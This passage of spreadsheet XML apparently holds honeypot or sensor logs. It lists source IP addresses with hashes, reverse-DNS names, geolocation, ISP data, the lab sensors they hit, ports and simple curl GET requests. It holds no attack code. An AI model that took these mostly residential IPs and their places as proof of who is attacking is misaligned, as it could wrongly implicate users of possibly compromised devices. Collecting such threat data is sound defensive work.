    <t>SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H21</t>
  </si>
  <si>
    <t>24.1632</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:31d5:b47b</t>
  </si>
  <si>
    <t>f4dce677ad797611056d17efa8a39c6b</t>
  </si>
  <si>
    <t>122.176.53.96</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H30</t>
  </si>
  <si>
    <t>23&amp;&amp;59364&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:7ab0:3560</t>
  </si>
  <si>
    <t>ae86eadfe5a1bcd82eceb53041b813b2</t>
  </si>
  <si>
    <t>125.229.231.164</t>
  </si>
  <si>
    <t>NA&amp;&amp;125-229-231-164.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H14</t>
  </si>
  <si>
    <t>::ffff:7de5:e7a4</t>
  </si>
  <si>
    <t>b311516df9baf3a94b644bafc64c2d18</t>
  </si>
  <si>
    <t>171.233.241.125</t>
  </si>
  <si>
    <t>Thành Phố Nam Định</t>
  </si>
  <si>
    <t>Nam Định</t>
  </si>
  <si>
    <t>1573517</t>
  </si>
  <si>
    <t>20.4339</t>
  </si>
  <si>
    <t>106.177</t>
  </si>
  <si>
    <t>::ffff:abe9:f17d</t>
  </si>
  <si>
    <t>98da32be92dfcd01fc3df33f1e83aa8b</t>
  </si>
  <si>
    <t>120.61.79.196</t>
  </si>
  <si>
    <t>::ffff:783d:4fc4</t>
  </si>
  <si>
    <t>e2899da74b7f9b8c8ae822dd49606fc4</t>
  </si>
  <si>
    <t>59.98.26.192</t>
  </si>
  <si>
    <t>::ffff:3b62:1ac0</t>
  </si>
  <si>
    <t>4b1983b1896792af4f1170154aed7dab</t>
  </si>
  <si>
    <t>36.233.73.68</t>
  </si>
  <si>
    <t>NA&amp;&amp;36-233-73-68.dynamic-ip.hinet.net</t>
  </si>
  <si>
    <t>::ffff:24e9:4944</t>
  </si>
  <si>
    <t>355edb73aacc3698cd49aeb2a6324fdf</t>
  </si>
  <si>
    <t>223.122.161.201</t>
  </si>
  <si>
    <t>::ffff:df7a:a1c9</t>
  </si>
  <si>
    <t>13139f97f6c7a1d765cbf83c948470b4</t>
  </si>
  <si>
    <t>59.92.177.73</t>
  </si>
  <si>
    <t>::ffff:3b5c:b149</t>
  </si>
  <si>
    <t>fbe6127db4b00599cb12d07929272988</t>
  </si>
  <si>
    <t>117.197.129.25</t>
  </si>
  <si>
    <t>::ffff:75c5:8119</t>
  </si>
  <si>
    <t>ec82426bb4f6ba350f76be31eaefc7cd</t>
  </si>
  <si>
    <t>59.126.205.125</t>
  </si>
  <si>
    <t>59-126-205-125.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_DNS_H35&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_DHCP_H15&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H7</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;53&amp;&amp;7539&amp;&amp;67&amp;&amp;54561&amp;&amp;23&amp;&amp;43243&amp;&amp;33602&amp;&amp;33608&amp;&amp;33615&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:3b7e:cd7d</t>
  </si>
  <si>
    <t>db2ea73e5d67b6c419241209a800b960</t>
  </si>
  <si>
    <t>59.127.236.50</t>
  </si>
  <si>
    <t>59-127-236-50.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H3&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H44</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;59722&amp;&amp;23&amp;&amp;80&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:3b7f:ec32</t>
  </si>
  <si>
    <t>1c0ee092d80adec07052eae468572dc6</t>
  </si>
  <si>
    <t>104.229.106.113</t>
  </si>
  <si>
    <t>syn-104-229-106-113.res.spectrum.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>Oneida</t>
  </si>
  <si>
    <t>Utica</t>
  </si>
  <si>
    <t>5142056</t>
  </si>
  <si>
    <t>13502</t>
  </si>
  <si>
    <t>43.1467</t>
  </si>
  <si>
    <t>-75.1779</t>
  </si>
  <si>
    <t>RRNY</t>
  </si>
  <si>
    <t>::ffff:68e5:6a71</t>
  </si>
  <si>
    <t>c96b1fe4bead7dcf4b0e82fcf5731907</t>
  </si>
  <si>
    <t>117.202.89.182</t>
  </si>
  <si>
    <t>::ffff:75ca:59b6</t>
  </si>
  <si>
    <t>59df00b0b3d6ad5641d3e26f5f190ecb</t>
  </si>
  <si>
    <t>178.41.217.118</t>
  </si>
  <si>
    <t>bband-dyn118.178-41-217.t-com.sk&amp;&amp;NA</t>
  </si>
  <si>
    <t>Nitra Region</t>
  </si>
  <si>
    <t>Nitra District</t>
  </si>
  <si>
    <t>Nitra</t>
  </si>
  <si>
    <t>3058531</t>
  </si>
  <si>
    <t>48.3076</t>
  </si>
  <si>
    <t>18.0845</t>
  </si>
  <si>
    <t>ST-DYNBBAND</t>
  </si>
  <si>
    <t>2010-02-02</t>
  </si>
  <si>
    <t>2003-09-23 00:00:00</t>
  </si>
  <si>
    <t>2025-09-23 00:00:00</t>
  </si>
  <si>
    <t>2024-09-10 00:00:00</t>
  </si>
  <si>
    <t>['ns.telecom.sk', 'ns2.telecom.sk']</t>
  </si>
  <si>
    <t>::ffff:b229:d976</t>
  </si>
  <si>
    <t>0d7b60b69ff88c6b2e68ad7f89f4787f</t>
  </si>
  <si>
    <t>117.5.187.200</t>
  </si>
  <si>
    <t>::ffff:7505:bbc8</t>
  </si>
  <si>
    <t>23e405f80c48626523a36a08c3be2536</t>
  </si>
  <si>
    <t>117.206.131.244</t>
  </si>
  <si>
    <t>::ffff:75ce:83f4</t>
  </si>
  <si>
    <t>4f83b3c7b6bc6449496c165f65e62ef4</t>
  </si>
  <si>
    <t>117.208.30.13</t>
  </si>
  <si>
    <t>Tirur</t>
  </si>
  <si>
    <t>1254346</t>
  </si>
  <si>
    <t>10.9137</t>
  </si>
  <si>
    <t>75.9212</t>
  </si>
  <si>
    <t>::ffff:75d0:1e0d</t>
  </si>
  <si>
    <t>032d7a7dc01d852676c09da18f4f9220</t>
  </si>
  <si>
    <t>36.233.177.125</t>
  </si>
  <si>
    <t>36-233-177-125.dynamic-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:24e9:b17d</t>
  </si>
  <si>
    <t>e7dd656606dd7fb6131d3beb9e77ffea</t>
  </si>
  <si>
    <t>112.135.222.209</t>
  </si>
  <si>
    <t>LK</t>
  </si>
  <si>
    <t>Sri Lanka</t>
  </si>
  <si>
    <t>Western</t>
  </si>
  <si>
    <t>Colombo District</t>
  </si>
  <si>
    <t>Colombo (Colombo Division)</t>
  </si>
  <si>
    <t>1248991</t>
  </si>
  <si>
    <t>6.93435</t>
  </si>
  <si>
    <t>79.8461</t>
  </si>
  <si>
    <t>9329</t>
  </si>
  <si>
    <t>Sri Lanka Telecom Ltd</t>
  </si>
  <si>
    <t>2009-01-29</t>
  </si>
  <si>
    <t>SLTADSL-SLT-LK</t>
  </si>
  <si>
    <t>::ffff:7087:ded1</t>
  </si>
  <si>
    <t>1c81815015a23d1b8ee38dfd22b4b12d</t>
  </si>
  <si>
    <t>41.59.146.185</t>
  </si>
  <si>
    <t>::ffff:293b:92b9</t>
  </si>
  <si>
    <t>02d9269a4817108872bb7039ad27f7a4</t>
  </si>
  <si>
    <t>117.242.239.111</t>
  </si>
  <si>
    <t>::ffff:75f2:ef6f</t>
  </si>
  <si>
    <t>262e3e104a11ef23c3cb1853341a5e29</t>
  </si>
  <si>
    <t>49.37.162.163</t>
  </si>
  <si>
    <t>Udupi</t>
  </si>
  <si>
    <t>1253952</t>
  </si>
  <si>
    <t>13.3347</t>
  </si>
  <si>
    <t>74.7462</t>
  </si>
  <si>
    <t>::ffff:3125:a2a3</t>
  </si>
  <si>
    <t>3d31fd81fa22e0f5aac3a5a06538877a</t>
  </si>
  <si>
    <t>59.183.102.101</t>
  </si>
  <si>
    <t>::ffff:3bb7:6665</t>
  </si>
  <si>
    <t>68e489ac589fbe39ceb58b7d3c33864c</t>
  </si>
  <si>
    <t>47.86.34.16</t>
  </si>
  <si>
    <t>ALIBABA-CN-NET</t>
  </si>
  <si>
    <t>Delta Centric LLC, Zenlayer Inc</t>
  </si>
  <si>
    <t>::ffff:2f56:2210</t>
  </si>
  <si>
    <t>c0106624e05095aeed3423f304269240</t>
  </si>
  <si>
    <t>207.251.61.89</t>
  </si>
  <si>
    <t>NM</t>
  </si>
  <si>
    <t>New Mexico</t>
  </si>
  <si>
    <t>Torrance</t>
  </si>
  <si>
    <t>Moriarty</t>
  </si>
  <si>
    <t>5480181</t>
  </si>
  <si>
    <t>87035</t>
  </si>
  <si>
    <t>35.0044</t>
  </si>
  <si>
    <t>-106.05</t>
  </si>
  <si>
    <t>11996</t>
  </si>
  <si>
    <t>Lobo Internet Services, Ltd</t>
  </si>
  <si>
    <t>2007-10-15</t>
  </si>
  <si>
    <t>LOBO-INTERNET-V4-01</t>
  </si>
  <si>
    <t>::ffff:cffb:3d59</t>
  </si>
  <si>
    <t>7e61c41faf5de59ec0ba10ce62d1a17c</t>
  </si>
  <si>
    <t>49.43.91.179</t>
  </si>
  <si>
    <t>31.3256</t>
  </si>
  <si>
    <t>75.5792</t>
  </si>
  <si>
    <t>::ffff:312b:5bb3</t>
  </si>
  <si>
    <t>fbc07f7cc4cc744138bae5d8b632dd48</t>
  </si>
  <si>
    <t>120.61.240.215</t>
  </si>
  <si>
    <t>::ffff:783d:f0d7</t>
  </si>
  <si>
    <t>90322cfca64bb22318745b4436b3e924</t>
  </si>
  <si>
    <t>117.197.177.233</t>
  </si>
  <si>
    <t>::ffff:75c5:b1e9</t>
  </si>
  <si>
    <t>0efb07efa76172537d7b455bb6632bdb</t>
  </si>
  <si>
    <t>117.243.252.165</t>
  </si>
  <si>
    <t>::ffff:75f3:fca5</t>
  </si>
  <si>
    <t>44e57f3e6ff0b51b1c3031ce9228a9a1</t>
  </si>
  <si>
    <t>37.36.77.123</t>
  </si>
  <si>
    <t>Janūb as Surrah</t>
  </si>
  <si>
    <t>285603</t>
  </si>
  <si>
    <t>29.2692</t>
  </si>
  <si>
    <t>47.9781</t>
  </si>
  <si>
    <t>::ffff:2524:4d7b</t>
  </si>
  <si>
    <t>5ee00c6672906b5165bd11b4ca120ec9</t>
  </si>
  <si>
    <t>59.183.30.210</t>
  </si>
  <si>
    <t>::ffff:3bb7:1ed2</t>
  </si>
  <si>
    <t>bedf780fdbf352658d4049df98184f31</t>
  </si>
  <si>
    <t>115.246.239.34</t>
  </si>
  <si>
    <t>1433&amp;&amp;52324&amp;&amp;52422&amp;&amp;3306</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;NA&amp;&amp;{Data_MYSQL:NA}</t>
  </si>
  <si>
    <t>::ffff:73f6:ef22</t>
  </si>
  <si>
    <t>fdfe1f938926aa434b768fc598b01c25</t>
  </si>
  <si>
    <t>117.194.207.142</t>
  </si>
  <si>
    <t>::ffff:75c2:cf8e</t>
  </si>
  <si>
    <t>8ace2ef8e9d81b2af89b5b0735b4889c</t>
  </si>
  <si>
    <t>117.197.174.180</t>
  </si>
  <si>
    <t>::ffff:75c5:aeb4</t>
  </si>
  <si>
    <t>012c59c975c466595c1224c1440e87f5</t>
  </si>
  <si>
    <t>117.206.182.71</t>
  </si>
  <si>
    <t>::ffff:75ce:b647</t>
  </si>
  <si>
    <t>74fa6b12d0a4cc8760f80a61c0583671</t>
  </si>
  <si>
    <t>59.127.79.196</t>
  </si>
  <si>
    <t>59-127-79-196.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H30&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H26</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;45752&amp;&amp;23&amp;&amp;80&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:3b7f:4fc4</t>
  </si>
  <si>
    <t>c45b10fbff892d4c679b8b76ef9f141e</t>
  </si>
  <si>
    <t>125.228.107.6</t>
  </si>
  <si>
    <t>NA&amp;&amp;125-228-107-6.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H19</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:7de4:6b06</t>
  </si>
  <si>
    <t>9347774b75857f1258f9cb930f3001d3</t>
  </si>
  <si>
    <t>1.34.51.65</t>
  </si>
  <si>
    <t>NA&amp;&amp;1-34-51-65.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H23</t>
  </si>
  <si>
    <t>::ffff:122:3341</t>
  </si>
  <si>
    <t>b8a7bdb0523b95c66e595ed40248cfa8</t>
  </si>
  <si>
    <t>111.93.62.188</t>
  </si>
  <si>
    <t>Mumbai (Ghodapdeo)</t>
  </si>
  <si>
    <t>18.9861</t>
  </si>
  <si>
    <t>72.8371</t>
  </si>
  <si>
    <t>Ttsl-isp Division</t>
  </si>
  <si>
    <t>Tata Teleservices Limited- North India</t>
  </si>
  <si>
    <t>2009-06-26</t>
  </si>
  <si>
    <t>TTSLISP</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (111.93.62.188,1217)}&amp;&amp;{Data_SMB:Incoming connection (111.93.62.188,4318)}&amp;&amp;{Data_SMB:Incoming connection (111.93.62.188,4279)}&amp;&amp;{Data_SMB:Incoming connection (111.93.62.188,3928)}</t>
  </si>
  <si>
    <t>::ffff:6f5d:3ebc</t>
  </si>
  <si>
    <t>500f38f1857624a425d6ee6d9a4118f5</t>
  </si>
  <si>
    <t>59.178.57.20</t>
  </si>
  <si>
    <t>::ffff:3bb2:3914</t>
  </si>
  <si>
    <t>e8b1a64ddd043e64c1741d522e59c024</t>
  </si>
  <si>
    <t>175.156.226.79</t>
  </si>
  <si>
    <t>MOBILEONELTD-AS-AP</t>
  </si>
  <si>
    <t>M1 Limited</t>
  </si>
  <si>
    <t>::ffff:af9c:e24f</t>
  </si>
  <si>
    <t>439d2a0604b50414cbfcc9523ac97a0a</t>
  </si>
  <si>
    <t>14.43.141.153</t>
  </si>
  <si>
    <t>52303&amp;&amp;23</t>
  </si>
  <si>
    <t>::ffff:e2b:8d99</t>
  </si>
  <si>
    <t>7c64cb7481b73f0b20164a6b7b24a0a9</t>
  </si>
  <si>
    <t>1.160.199.51</t>
  </si>
  <si>
    <t>1-160-199-51.dynamic-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>25.0531</t>
  </si>
  <si>
    <t>::ffff:1a0:c733</t>
  </si>
  <si>
    <t>6d960a2161aa7300017cc096aa296f46</t>
  </si>
  <si>
    <t>66.168.134.212</t>
  </si>
  <si>
    <t>NA&amp;&amp;syn-066-168-134-212.res.spectrum.com</t>
  </si>
  <si>
    <t>Scotts Bluff</t>
  </si>
  <si>
    <t>Scottsbluff</t>
  </si>
  <si>
    <t>5699404</t>
  </si>
  <si>
    <t>69361</t>
  </si>
  <si>
    <t>41.8666</t>
  </si>
  <si>
    <t>-103.667</t>
  </si>
  <si>
    <t>2001-09-12</t>
  </si>
  <si>
    <t>CHARTER-NET-4BLK</t>
  </si>
  <si>
    <t>::ffff:42a8:86d4</t>
  </si>
  <si>
    <t>ea20c3dec9f8dbaa16aa6aa3b8c2e569</t>
  </si>
  <si>
    <t>220.133.204.17</t>
  </si>
  <si>
    <t>NA&amp;&amp;220-133-204-17.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>NA&amp;&amp;23&amp;&amp;80</t>
  </si>
  <si>
    <t>NA&amp;&amp;connection&amp;&amp;GET</t>
  </si>
  <si>
    <t>::ffff:dc85:cc11</t>
  </si>
  <si>
    <t>7961692258e3fcea339946391500ee4a</t>
  </si>
  <si>
    <t>59.127.234.125</t>
  </si>
  <si>
    <t>NA&amp;&amp;59-127-234-125.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H28</t>
  </si>
  <si>
    <t>::ffff:3b7f:ea7d</t>
  </si>
  <si>
    <t>986173a4ee9a77eebb8eb0a9c1289bd6</t>
  </si>
  <si>
    <t>220.133.167.224</t>
  </si>
  <si>
    <t>220-133-167-224.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H36</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}</t>
  </si>
  <si>
    <t>::ffff:dc85:a7e0</t>
  </si>
  <si>
    <t>ad523bdb9f1b5507fe3a135f840d0717</t>
  </si>
  <si>
    <t>117.233.168.195</t>
  </si>
  <si>
    <t>::ffff:75e9:a8c3</t>
  </si>
  <si>
    <t>fb0f29d95d16c750137143ffbc700000</t>
  </si>
  <si>
    <t>220.94.90.70</t>
  </si>
  <si>
    <t>{'korea.services.net': ['unknown']&amp;&amp; 'spamsources.fabel.dk': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}</t>
  </si>
  <si>
    <t>Daegu</t>
  </si>
  <si>
    <t>Daegu (Dongin 2(i)-ga)</t>
  </si>
  <si>
    <t>1835329</t>
  </si>
  <si>
    <t>35.8683</t>
  </si>
  <si>
    <t>128.606</t>
  </si>
  <si>
    <t>hangugtongsindaegubonbu</t>
  </si>
  <si>
    <t>::ffff:dc5e:5a46</t>
  </si>
  <si>
    <t>b846d01d027445a6b7d4894432a8bd6f</t>
  </si>
  <si>
    <t>59.182.144.155</t>
  </si>
  <si>
    <t>::ffff:3bb6:909b</t>
  </si>
  <si>
    <t>6ab104f5d8aaa46df980552ccac55896</t>
  </si>
  <si>
    <t>122.167.165.234</t>
  </si>
  <si>
    <t>Bharti</t>
  </si>
  <si>
    <t>::ffff:7aa7:a5ea</t>
  </si>
  <si>
    <t>cadd15f38cf27c620d11b038f0dbdd44</t>
  </si>
  <si>
    <t>59.127.117.186</t>
  </si>
  <si>
    <t>NA&amp;&amp;59-127-117-186.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H20</t>
  </si>
  <si>
    <t>23&amp;&amp;NA&amp;&amp;30092&amp;&amp;52351&amp;&amp;52382</t>
  </si>
  <si>
    <t>::ffff:3b7f:75ba</t>
  </si>
  <si>
    <t>399ecef646cf5040aa873b34f974d7e0</t>
  </si>
  <si>
    <t>59.127.235.146</t>
  </si>
  <si>
    <t>59-127-235-146.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_LDAP_H43&amp;&amp;SMA-LAB_SOCKS5_H43&amp;&amp;SMA-LAB_SSH_H6&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_HTTPS_H35&amp;&amp;SMA-LAB_NTP_H47&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNE